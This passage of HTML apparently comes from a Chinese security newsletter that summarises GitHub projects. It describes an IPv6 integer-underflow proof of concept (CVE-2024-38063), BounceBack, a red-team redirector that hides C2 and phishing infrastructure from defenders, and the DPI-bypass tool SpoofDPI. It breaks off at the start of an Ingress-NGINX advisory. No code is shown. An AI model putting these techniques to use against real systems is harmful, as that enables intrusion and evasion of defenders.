		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CVE-2024-38063.py</code>脚本旨在展示IPv6数据包处理中的整数下溢漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞存在于<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">process_packet</code>方法中，该方法没有检查整数下溢，并且使用了未检查的<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">total_length</code>来写入缓冲区，可能导致缓冲区溢出。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过创建一个具有极大扩展头部长度的恶意数据包，可以触发整数下溢，从而可能导致程序崩溃。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本中的注释清晰地指出了漏洞的位置和可能的危险操作，如未检查的缓冲区写入。</section></li></ul>
	<br/>
	<p>🏷️: Python, IPv6, 漏洞, GitHub</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0f
			 BounceBack：红队操作安全的隐蔽重定向工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">BounceBack 是一个用于红队运营安全的隐蔽重定向工具，它是一个高度可配置和定制化的反向代理，具有 Web 应用程序防火墙（WAF）功能，能够通过实时流量分析和多种过滤器组合隐藏 C2/钓鱼等基础设施，防止蓝队、沙箱、扫描器等非法访问。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.7883064516129032" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="992" src="https://wechat2rss.xlab.app/img-proxy/?k=e720d4a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgSFibiadibr5I954YAutrqcDTZlgDkxvVwA5FVJjDpUxN6icJZEBaDT6RMQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">BounceBack: 红队行动的隐形重定向工具</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">BounceBack：红队操作的安全隐蔽重定向工具</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgU8iaZvc06o98ibCngA7bUyrAFpcwUPHN2WuFrKytgqFA91qnwfWP1NMQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgU8iaZvc06o98ibCngA7bUyrAFpcwUPHN2WuFrKytgqFA91qnwfWP1NMQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855181425145551"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">隐藏基础设施：BounceBack 的主要目的是隐藏红队的攻击基础设施，防止被蓝队等安全机构检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">高度可配置：工具提供了丰富的配置选项，包括过滤器管道、规则组合、IP 地理位置检查等，以满足不同的操作需求。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">易于扩展：BounceBack 的项目结构允许用户轻松添加自定义规则和协议，以适应特定的 C2 或操作场景。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">流量分析：通过实时流量分析和多层次的过滤器，BounceBack 能够有效地识别和拒绝非法流量。</section></li></ul>
	<br/>
	<p>🏷️: 红队, 隐蔽重定向, 反向代理, WAF, 流量分析</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x10
			 SpoofDPI：一款快速绕过深度包检测的软件</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">SpoofDPI 是一个简单快速的软件，旨在绕过深度数据包检测（DPI）。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.31788079470198677" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="906" src="https://wechat2rss.xlab.app/img-proxy/?k=6830b09f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgDNMQnooqwNZLR6RnY5b6DYMkaibzeMSxpUOxCReTgic2XEqavkEN3ia8w%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Go语言编写的简单快速反审查工具</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SpoofDPI: 反审查利器，像鲨鱼一样在网络中穿梭</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgCY1Yop1jKKE8TOTN8rHaUCzNfYb3Ze15TtADPicyeH0lLdN0EHllWtQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgCY1Yop1jKKE8TOTN8rHaUCzNfYb3Ze15TtADPicyeH0lLdN0EHllWtQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844181254121258"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SpoofDPI 的设计目的是绕过 DPI，特别是针对 TLS 握手过程中的客户端请求。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">软件支持多种操作系统和架构，提供了灵活的安装和使用方式。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SpoofDPI 通过将客户端请求的第一个字节单独发送的方法，来避免 DPI 的检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管 HTTPS 通信大多数情况下能够隐藏请求细节，但客户端请求中的域名信息仍然以明文形式出现，可能会被 DPI 检测到。</section></li></ul>
	<br/>
	<p>🏷️: DPI绕过, 网络安全, 软件工具, GitHub项目</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x11
			 CVE-2024-7646：Ingress-NGINX注解验证绕过漏洞深度解析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
